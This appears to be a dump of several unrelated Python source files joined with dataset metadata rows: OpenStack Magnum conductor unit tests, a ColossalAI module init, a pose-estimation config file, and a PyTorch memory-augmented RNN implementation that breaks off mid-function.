definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'minion_flavor': 'flavor_id',
'master_flavor': 'master_flavor_id',
'number_of_minions': 1,
'number_of_masters': 1,
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'discovery_url': 'https://discovery.etcd.io/test',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
self.assertEqual(expected, definition)
@patch('requests.get')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_coreos_no_discoveryurl(
self,
mock_objects_baymodel_get_by_uuid,
reqget):
self.baymodel_dict['cluster_distro'] = 'coreos'
self.bay_dict['discovery_url'] = None
mock_req = mock.MagicMock(text='http://tokentest/h1/h2/h3')
reqget.return_value = mock_req
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'minion_flavor': 'flavor_id',
'master_flavor': 'master_flavor_id',
'number_of_minions': 1,
'number_of_masters': 1,
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'discovery_url': 'http://tokentest/h1/h2/h3',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
self.assertEqual(expected, definition)
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_dns(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='dns_nameserver')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_server_image(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='image_id')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_minion_flavor(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='flavor_id')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_docker_volume_size(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='docker_volume_size')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_master_flavor(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='master_flavor_id')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_apiserver_port(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='apiserver_port')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_node_count(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='node_count')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_master_count(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid,
missing_attr='master_count')
@patch('requests.get')
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_without_discovery_url(
self,
mock_objects_baymodel_get_by_uuid,
reqget):
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay_dict = self.bay_dict
bay_dict['discovery_url'] = None
bay = objects.Bay(self.context, **bay_dict)
cfg.CONF.set_override('etcd_discovery_service_endpoint_format',
'http://etcd/test?size=%(size)d',
group='bay')
mock_req = mock.MagicMock(text='https://address/token')
reqget.return_value = mock_req
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'master_flavor': 'master_flavor_id',
'minion_flavor': 'flavor_id',
'number_of_minions': 1,
'number_of_masters': 1,
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'docker_volume_size': 20,
'discovery_url': 'https://address/token',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'tenant_name': 'fake_tenant',
'username': 'fake_user',
'bay_uuid': self.bay_dict['uuid'],
'magnum_url': self.mock_osc.magnum_url.return_value,
'region_name': self.mock_osc.cinder_region_name.return_value,
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
self.assertEqual(expected, definition)
reqget.assert_called_once_with('http://etcd/test?size=1')
@patch('magnum.common.short_id.generate_id')
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_create_stack(self,
mock_extract_template_definition,
mock_get_template_contents,
mock_generate_id):
mock_generate_id.return_value = 'xx-xx-xx-xx'
expected_stack_name = 'expected_stack_name-xx-xx-xx-xx'
expected_template_contents = 'template_contents'
dummy_bay_name = 'expected_stack_name'
expected_timeout = 15
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.name = dummy_bay_name
bay_conductor._create_stack(self.context, mock_osc,
mock_bay, expected_timeout)
expected_args = {
'stack_name': expected_stack_name,
'parameters': {},
'template': expected_template_contents,
'files': {},
'timeout_mins': expected_timeout
}
mock_heat_client.stacks.create.assert_called_once_with(**expected_args)
@patch('magnum.common.short_id.generate_id')
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_create_stack_no_timeout_specified(
self,
mock_extract_template_definition,
mock_get_template_contents,
mock_generate_id):
mock_generate_id.return_value = 'xx-xx-xx-xx'
expected_stack_name = 'expected_stack_name-xx-xx-xx-xx'
expected_template_contents = 'template_contents'
dummy_bay_name = 'expected_stack_name'
expected_timeout = cfg.CONF.bay_heat.bay_create_timeout
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.name = dummy_bay_name
bay_conductor._create_stack(self.context, mock_osc,
mock_bay, None)
expected_args = {
'stack_name': expected_stack_name,
'parameters': {},
'template': expected_template_contents,
'files': {},
'timeout_mins': expected_timeout
}
mock_heat_client.stacks.create.assert_called_once_with(**expected_args)
@patch('magnum.common.short_id.generate_id')
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_create_stack_timeout_is_zero(
self,
mock_extract_template_definition,
mock_get_template_contents,
mock_generate_id):
mock_generate_id.return_value = 'xx-xx-xx-xx'
expected_stack_name = 'expected_stack_name-xx-xx-xx-xx'
expected_template_contents = 'template_contents'
dummy_bay_name = 'expected_stack_name'
bay_timeout = 0
expected_timeout = None
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.name = dummy_bay_name
bay_conductor._create_stack(self.context, mock_osc,
mock_bay, bay_timeout)
expected_args = {
'stack_name': expected_stack_name,
'parameters': {},
'template': expected_template_contents,
'files': {},
'timeout_mins': expected_timeout
}
mock_heat_client.stacks.create.assert_called_once_with(**expected_args)
@patch('heatclient.common.template_utils.get_template_contents')
@patch('magnum.conductor.handlers.bay_conductor'
'._extract_template_definition')
def test_update_stack(self,
mock_extract_template_definition,
mock_get_template_contents):
mock_stack_id = 'xx-xx-xx-xx'
expected_template_contents = 'template_contents'
mock_tpl_files = {}
mock_get_template_contents.return_value = [
mock_tpl_files, expected_template_contents]
mock_extract_template_definition.return_value = ('template/path',
{})
mock_heat_client = mock.MagicMock()
mock_osc = mock.MagicMock()
mock_osc.heat.return_value = mock_heat_client
mock_bay = mock.MagicMock()
mock_bay.stack_id = mock_stack_id
bay_conductor._update_stack({}, mock_osc, mock_bay)
expected_args = {
'parameters': {},
'template': expected_template_contents,
'files': {}
}
mock_heat_client.stacks.update.assert_called_once_with(mock_stack_id,
**expected_args)
| 42.5 | 79 | 0.607083 | 2,639 | 24,565 | 5.234937 | 0.104585 | 0.049946 | 0.05342 | 0.059356 | 0.819399 | 0.786102 | 0.768874 | 0.749403 | 0.730583 | 0.715671 | 0 | 0.036923 | 0.287767 | 24,565 | 577 | 80 | 42.573657 | 0.752686 | 0.02357 | 0 | 0.730469 | 0 | 0 | 0.307567 | 0.093234 | 0 | 0 | 0 | 0 | 0.019531 | 1 | 0.037109 | false | 0.011719 | 0.011719 | 0 | 0.050781 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
422c3676c09d6698c7dd81b2b1c5d3c3b3a0bc50 | 358 | py | Python | colossalai/context/random/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 1,630 | 2021-10-30T01:00:27.000Z | 2022-03-31T23:02:41.000Z | colossalai/context/random/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 166 | 2021-10-30T01:03:01.000Z | 2022-03-31T14:19:07.000Z | colossalai/context/random/__init__.py | RichardoLuo/ColossalAI | 797a9dc5a9e801d7499b8667c3ef039a38aa15ba | [
"Apache-2.0"
] | 253 | 2021-10-30T06:10:29.000Z | 2022-03-31T13:30:06.000Z | from ._helper import (seed, set_mode, with_seed, add_seed, get_seeds, get_states, get_current_mode, set_seed_states,
sync_states, moe_set_seed, reset_seeds)
__all__ = [
'seed', 'set_mode', 'with_seed', 'add_seed', 'get_seeds', 'get_states', 'get_current_mode', 'set_seed_states',
'sync_states', 'moe_set_seed', 'reset_seeds'
]
| 44.75 | 116 | 0.698324 | 52 | 358 | 4.211538 | 0.307692 | 0.127854 | 0.100457 | 0.136986 | 0.913242 | 0.913242 | 0.913242 | 0.913242 | 0.913242 | 0.913242 | 0 | 0 | 0.167598 | 358 | 7 | 117 | 51.142857 | 0.734899 | 0 | 0 | 0 | 0 | 0 | 0.315642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
42329cac17be7ce007d2fb380cc16fb22ff9aeea | 9,172 | py | Python | config.py | xiaohanhaowei/cpm | 1d6e1df7b38d28ba71e90a401b07faf882d1319d | [
"Apache-2.0"
] | null | null | null | config.py | xiaohanhaowei/cpm | 1d6e1df7b38d28ba71e90a401b07faf882d1319d | [
"Apache-2.0"
] | 1 | 2020-04-09T05:59:42.000Z | 2020-04-09T05:59:42.000Z | config.py | xiaohanhaowei/cpm | 1d6e1df7b38d28ba71e90a401b07faf882d1319d | [
"Apache-2.0"
] | null | null | null | class FLAGS(object):
""" """
"""
General settings
"""
input_size = 256
heatmap_size = 32
cpm_stages = 3
joint_gaussian_variance = 1.0
center_radius = 21
num_of_joints = 6
color_channel = 'RGB'
normalize_img = True
use_gpu = True
gpu_id = 0
box_size = 256 # in compatible with the `create_cpm_tfr_fulljoints.py`
"""
Demo settings
"""
# 'MULTI': show multiple stage heatmaps
# 'SINGLE': show last stage heatmap
# 'Joint_HM': show last stage heatmap for each joint
# 'image or video path': show detection on single image or video
# DEMO_TYPE = 'test_imgs/139.jpg'
# DEMO_TYPE = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/img3/4424.jpg'
DEMO_TYPE = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/img3/4424.jpg'
# DEMO_TYPE = 'SINGLE'
# model_path = 'cpm_hand'
model_path = 'cpm_hand'
cam_id = 0
webcam_height = 480
webcam_width = 640
KALMAN_ON = False
use_kalman = False
kalman_noise = 0.03
cmap_radius = 21
"""
Training settings
"""
network_def = 'cpm_hand'
# added by hongwei.wang
# now train_img_dir and val_img_dir are moved to the ~/WorkSpace/datasets
# there is no need to modify them because we don't train the model at local machine
# train_img_dir = '/home/wanghongwei/WorkSpace/detect/cpm-tf/dataset/train/fas_train_dataset.tfrecords'
# val_img_dir = '/home/wanghongwei/WorkSpace/detect/cpm-tf/dataset/eval/fas_eval_dataset.tfrecords'
train_img_dir = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/tfrecords-from-cpm/train/fas_train_dataset.tfrecords'
val_img_dir = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/tfrecords-from-cpm/eval/fas_eval_dataset.tfrecords'
bg_img_dir = '/home/wanghongwei/WorkSpace/datasets/fans/datasets/tfrecords-from-cpm/bg/fas_bg_dataset.tfrecords'
# pretrained_model = '/home/wanghongwei/WorkSpace/detect/cpm-tf/models/weights/cpm_hand/input_256_output_32/joints_6/stages_3/init_0.001_rate_0.5_step_10000'
pretrained_model = '/home/wanghongwei/WorkSpace/source/detect/cpm-tf/models/weights/cpm_hand/34-test'
# pretrained_model_file = '/home/wanghongwei/WorkSpace/source/detect/cpm-tf/models/weights/cpm_hand/finetune-0119/init_0.05_rate_0.7_step_10000-300000'
# pretrained_model_file = '/home/wanghongwei/WorkSpace/source/detect/cpm-tf/models/weights/cpm_hand/finetune-0120/init_0.07_rate_0.5_step_15000-200000'
pretrained_model_file = '/home/wanghongwei/WorkSpace/weights/cpm/finetune-0305/init_0.071_rate_0.5_step_20000-300000'
batch_size = 1
init_lr = 0.001
lr_decay_rate = 0.5
lr_decay_step = 10000
training_iters = 100000
verbose_iters = 10
validation_iters = 1000
model_save_iters = 500
augmentation_config = {'hue_shift_limit': (-5, 5),
'sat_shift_limit': (-10, 10),
'val_shift_limit': (-15, 15),
'translation_limit': (-0.15, 0.15),
'scale_limit': (-0.3, 0.5),
'rotate_limit': (-90, 90)}
hnm = True # Make sure generate hnm files first
do_cropping = True
"""
For Freeze graphs
"""
output_node_names = 'stage_3/mid_conv7/BiasAdd:0'
"""
For Drawing
"""
# Default Pose
default_hand = [[259, 335],
[245, 311],
[226, 288],
[206, 270],
[195, 261],
[203, 308],
[165, 290],
[139, 287],
[119, 284],
[199, 328],
[156, 318],
[128, 314],
[104, 318],
[204, 341],
[163, 340],
[133, 347],
[108, 349],
[206, 359],
[176, 368],
[164, 370],
[144, 377]]
# Limb connections
# center-> little finger
# center -> ring finger
# center -> middle finger
# center -> forefinger
# center -> firstfinger
limbs = [[0, 1],
[1, 2],
[2, 3],
[3, 4], # which limb connection
[0, 5]
# [5, 6],
# [6, 7],
# [7, 8], # limb connection
# [0, 9],
# [9, 10],
# [10, 11],
# [11, 12], # limb connection
# [0, 13],
# [13, 14],
# [14, 15],
# [15, 16], # limb connection
# [0, 17],
# [17, 18],
# [18, 19],
# [19, 20] # limb connection
]
# Finger colors
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# My hand joint order
# FLAGS.limbs = [[0, 1],
# [1, 2],
# [2, 3],
# [3, 20],
# [4, 5],
# [5, 6],
# [6, 7],
# [7, 20],
# [8, 9],
# [9, 10],
# [10, 11],
# [11, 20],
# [12, 13],
# [13, 14],
# [14, 15],
# [15, 20],
# [16, 17],
# [17, 18],
# [18, 19],
# [19, 20]
# ]
class PIN_FLAGS(object):
""" """
"""
General settings
"""
input_size = 256
heatmap_size = 32
cpm_stages = 3
joint_gaussian_variance = 1.0
center_radius = 21
num_of_joints = 6
color_channel = 'RGB'
normalize_img = True
use_gpu = True
gpu_id = 0
"""
Demo settings
"""
# 'MULTI': show multiple stage heatmaps
# 'SINGLE': show last stage heatmap
# 'Joint_HM': show last stage heatmap for each joint
# 'image or video path': show detection on single image or video
DEMO_TYPE = 'MULTI'
model_path = 'cpm_hand'
cam_id = 0
webcam_height = 480
webcam_width = 640
KALMAN_ON = False
use_kalman = True
kalman_noise = 0.03
"""
Training settings
"""
network_def = 'cpm_hand'
train_img_dir = ''
val_img_dir = ''
bg_img_dir = ''
pretrained_model = 'cpm_hand'
batch_size = 5
init_lr = 0.001
lr_decay_rate = 0.5
lr_decay_step = 10000
training_iters = 300000
verbose_iters = 10
validation_iters = 1000
model_save_iters = 5000
augmentation_config = {'hue_shift_limit': (-5, 5),
'sat_shift_limit': (-10, 10),
'val_shift_limit': (-15, 15),
'translation_limit': (-0.15, 0.15),
'scale_limit': (-0.3, 0.5),
'rotate_limit': (-90, 90)}
hnm = True # Make sure generate hnm files first
do_cropping = True
"""
For Freeze graphs
"""
output_node_names = 'stage_3/mid_conv7/BiasAdd:0'
"""
For Drawing
"""
# Default Pose
default_hand = [[259, 335],
[245, 311],
[226, 288],
[206, 270],
[195, 261],
[203, 308],
[165, 290],
[139, 287],
[119, 284],
[199, 328],
[156, 318],
[128, 314],
[104, 318],
[204, 341],
[163, 340],
[133, 347],
[108, 349],
[206, 359],
[176, 368],
[164, 370],
[144, 377]]
# Limb connections
limbs = [[0, 1],
[1, 2],
[2, 3],
[3, 4],
[0, 5],
[5, 6],
[6, 7],
[7, 8],
[0, 9],
[9, 10],
[10, 11],
[11, 12],
[0, 13],
[13, 14],
[14, 15],
[15, 16],
[0, 17],
[17, 18],
[18, 19],
[19, 20]
]
# Finger colors
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# My hand joint order
# FLAGS.limbs = [[0, 1],
# [1, 2],
# [2, 3],
# [3, 20],
# [4, 5],
# [5, 6],
# [6, 7],
# [7, 20],
# [8, 9],
# [9, 10],
# [10, 11],
# [11, 20],
# [12, 13],
# [13, 14],
# [14, 15],
# [15, 20],
# [16, 17],
# [17, 18],
# [18, 19],
# [19, 20]
# ]
| 29.303514 | 161 | 0.450611 | 1,007 | 9,172 | 3.91857 | 0.265144 | 0.045616 | 0.072985 | 0.040547 | 0.812468 | 0.791181 | 0.754942 | 0.747086 | 0.721237 | 0.6741 | 0 | 0.156767 | 0.419974 | 9,172 | 312 | 162 | 29.397436 | 0.584962 | 0.296337 | 0 | 0.746988 | 0 | 0.03012 | 0.134427 | 0.097795 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.487952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
427f4cf06609600ffc73e962e424aa63d6499c54 | 17,510 | py | Python | algorithimic_tasks/marnn.py | zoharli/armin | 9bf8e4533850a66bbef26390244f0d0ad30c067b | [
"MIT"
] | 3 | 2019-07-01T12:11:29.000Z | 2020-05-25T22:37:50.000Z | algorithimic_tasks/marnn.py | zoharli/armin | 9bf8e4533850a66bbef26390244f0d0ad30c067b | [
"MIT"
] | null | null | null | algorithimic_tasks/marnn.py | zoharli/armin | 9bf8e4533850a66bbef26390244f0d0ad30c067b | [
"MIT"
] | null | null | null | from __future__ import print_function
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
import random
import helper
class LSTMCell(nn.Module):
def __init__(self,config,input_size,num_units, use_ln,use_zoneout, f_bias = 1.):
super().__init__()
self.input_size=input_size
self.num_units = num_units
self.f_bias = f_bias
self.use_ln=use_ln
self.use_zoneout = use_zoneout
x_size=input_size
h_size=num_units
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+h_size, 4 * h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([4*h_size]))
def forward(self, x ):
h, c = self.recurrent_state
h_size = self.num_units
x_size = self.input_size
concat = torch.cat((x,h), dim= 1)
concat = torch.mm(concat,self.W_full) + self.bias
i,j,f,o = torch.split(concat,h_size, dim=1)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * torch.tanh(j)
new_h = torch.tanh(new_c) * torch.sigmoid(o)
self.recurrent_state=(new_h,new_c)
return new_h
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])
c = torch.zeros([batch_size, self.num_units])
self.recurrent_state=(h, c)
class MARNN(nn.Module):
def __init__(self,config,input_size,num_units,output_size, use_zoneout=True,
use_ln=True):
super().__init__()
if config.model=='armin':
self.cell=ARMIN(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
elif config.model=='tardis':
self.cell=TARDIS(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
elif config.model=='awta':
self.cell=ARMIN_with_TARDIS_addr(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
elif config.model=='lstm':
self.cell=LSTMCell(config,input_size,num_units,use_zoneout=use_zoneout,use_ln=use_ln)
if config.model=='lstm':
self.fc=nn.Linear(num_units,output_size)
else:
self.fc=nn.Linear(config.r_size+num_units,output_size)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
def forward(self,x):
return torch.sigmoid(self.fc(self.cell(x)))
def reset(self,batch_size=1):
self.cell.zero_state(batch_size)
if hasattr(self.cell,'_reset_mem'):
self.cell._reset_mem(batch_size)
class ARMIN(nn.Module):
def __init__(self,config,input_size,num_units, use_zoneout=True,
use_ln=True,indrop=True,outdrop=True, f_bias = 1.):
super().__init__()
self.input_size=input_size
self.num_units = num_units
self.f_bias = f_bias
self.use_zoneout = use_zoneout
self.use_ln=use_ln
x_size=input_size
h_size=num_units
self.r_size=r_size=config.r_size
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+4* h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([r_size+4*h_size]))
self.W_full1 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, r_size+h_size] , scale = 1.0))
self.bias1 = nn.Parameter(torch.zeros([r_size+h_size]))
self.trans=nn.Linear(x_size+h_size,r_size)
torch.nn.init.orthogonal_(self.trans.weight)
torch.nn.init.constant_(self.trans.bias,0)
self.c_bias=nn.Parameter(torch.rand(1,num_units))
self.hmem_bias=nn.Parameter(torch.zeros(1,config.mem_cap,r_size))
self.memcnt=0
self.mem_cap=config.mem_cap
self.tau=1.
self.fc=nn.Linear(x_size+h_size,config.mem_cap)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
def forward(self, x0):
h,c= self.recurrent_state
x=x0
h_size = self.num_units
x_size = self.input_size
h_read_head=torch.cat([x,c],dim=1)
h_read_head=self.fc(h_read_head)
h_entry,h_read_index=self.read(h_read_head,self.tau)
new_c=torch.cat([c,h_entry],dim=1)
concat = torch.cat((x,new_c), dim= 1)
concat1=torch.mm(concat,self.W_full1) +self.bias1
concat1=torch.sigmoid(concat1)
concat1=torch.cat([torch.ones_like(x),concat1],dim=1)
concat = concat*concat1
concat = torch.mm(concat,self.W_full) + self.bias
i,j,f,o,om = torch.split(concat,h_size, dim=1)
new_c = c * torch.sigmoid(f + self.f_bias) + torch.sigmoid(i) * torch.tanh(j)
new_c=torch.tanh(new_c)
new_h = new_c * torch.sigmoid(o)
r = h_entry * torch.sigmoid(om)
if self.memcnt<self.mem_cap:
h_write_index=torch.cat([torch.zeros(self.memcnt),torch.ones(1),torch.zeros(self.mem_cap-1-self.memcnt)]).unsqueeze(0)
self.memcnt+=1
else:
h_write_index=h_read_index.detach()
self.write(self.trans(torch.cat([x,new_c],dim=1)),h_write_index)
self.recurrent_state=(new_h,new_c)
new_r=torch.cat([new_h,r],dim=1)
return new_r
def zero_state(self, batch_size):
h = torch.zeros([batch_size, self.num_units])
c = torch.zeros([batch_size, self.num_units])+torch.tanh(self.c_bias)
self.recurrent_state=(h, c)
def _reset_mem(self,batch_size):
self.memcnt=0
self.hmem=torch.zeros(batch_size,self.mem_cap,self.r_size)+self.hmem_bias
def _reload_mem(self):
self.hmem=self.hmem.detach()
def set_tau(self,num):
self.tau=num
def write(self,h,h_index):
h_ones=h_index.unsqueeze(2)
self.hmem=h.unsqueeze(1)*h_ones+self.hmem*(1.-h_ones)
def read(self,h_read_head,tau):
h_index=torch.nn.functional.softmax(h_read_head,dim=1)
h_entry=h_index.unsqueeze(2)*self.hmem
h_entry=h_entry.sum(dim=1)
return h_entry,h_index
def gumbel_softmax(self,input, tau):
gumbel = -torch.log(1e-20-torch.log(1e-20+torch.rand(*input.shape)))
y=torch.nn.functional.softmax((input+gumbel)*tau,dim=1)
ymax,pos=y.max(dim=1)
hard_y=torch.eq(y,ymax.unsqueeze(1)).float()
y=(hard_y-y).detach()+y
return y,pos
def _reset_inf_mem(self):
self.memcnt=0
self.hmem=[]
for _ in range(self.mem_cap):
self.hmem.append(torch.zeros(1,self.num_units).cuda())
class TARDIS(nn.Module):
def __init__(self,config,input_size,num_units, use_zoneout=True,
use_ln=True,indrop=True,outdrop=True, f_bias = 1.):
super().__init__()
self.input_size = input_size
self.num_units = num_units
self.f_bias = f_bias
self.use_zoneout = use_zoneout
self.use_ln=use_ln
self.indrop=indrop
self.outdrop=outdrop
x_size=input_size
h_size=num_units
self.r_size=r_size=config.r_size
self.W_full = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, 3 * h_size] , scale = 1.0))
self.bias = nn.Parameter(torch.zeros([3*h_size]))
self.W_full1 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, 2] , scale = 1.0))
self.bias1 = nn.Parameter(torch.zeros([2]))
self.W_full2 = nn.Parameter(helper.orthogonal_initializer([x_size+r_size+h_size, 1*h_size] , scale = 1.0))
self.bias2 = nn.Parameter(torch.zeros([1*h_size]))
self.memcnt=0
self.mem_cap=config.mem_cap
self.tau=1.
self.c_bias=nn.Parameter(torch.zeros(1,h_size))
self.h_bias=nn.Parameter(torch.zeros(1,h_size))
self.hmem_bias=nn.Parameter(torch.zeros(1,config.mem_cap,r_size))
self.keys= nn.Parameter(torch.zeros(config.mem_cap,config.key_size))
self.vec_a=nn.Parameter(torch.zeros(h_size//4,1))
nn.init.orthogonal_(self.keys)
nn.init.orthogonal_(self.vec_a)
self.fc=nn.Linear(x_size+r_size+h_size+config.key_size+config.mem_cap,h_size//4)
self.fc.weight.data=helper.orthogonal_initializer([self.fc.weight.shape[1],self.fc.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc.bias,0)
self.fc1=nn.Linear(h_size+x_size,r_size)
self.fc1.weight.data=helper.orthogonal_initializer([self.fc1.weight.shape[1],self.fc1.weight.shape[0]]).t_()
torch.nn.init.constant_(self.fc1.bias,0)
self.u_t=None
self.prev_read_location=None
def forward(self, x0):
h,c= self.recurrent_state
x=x0
h_size = self.num_units
x_size = self.input_size
h_read_head=torch.cat([torch.cat([x,c],dim=1).unsqueeze(1).expand(-1,self.mem_cap,-1),
self.keys.unsqueeze(0).expand(x.shape[0],-1,-1),
self.hmem,
